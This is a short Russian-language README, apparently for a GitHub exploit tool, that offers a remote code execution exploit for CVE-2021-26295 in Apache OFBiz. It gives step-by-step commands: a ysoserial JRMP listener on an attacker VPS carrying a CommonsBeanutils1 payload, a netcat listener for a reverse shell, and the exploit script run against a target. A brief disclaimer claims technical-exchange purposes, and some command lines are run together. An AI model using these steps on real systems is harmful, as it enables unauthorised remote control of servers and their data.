
Эксплойт для CVE-2021-26295 (RCE в Apache OFBiz) с использованием прослушивателя JRMP ysoserial для выполнения команд и получения обратного шелла на уязвимых целях.
CVE-2021-26295 EXP может успешно выполнить обратную оболочку (reverse shell)
Данная статья и инструмент предназначены только для технического обмена. Строго запрещено использование в незаконных целях. В противном случае всю ответственность несет пользователь.
RMI на порту 9999 на VPSjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc64444nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

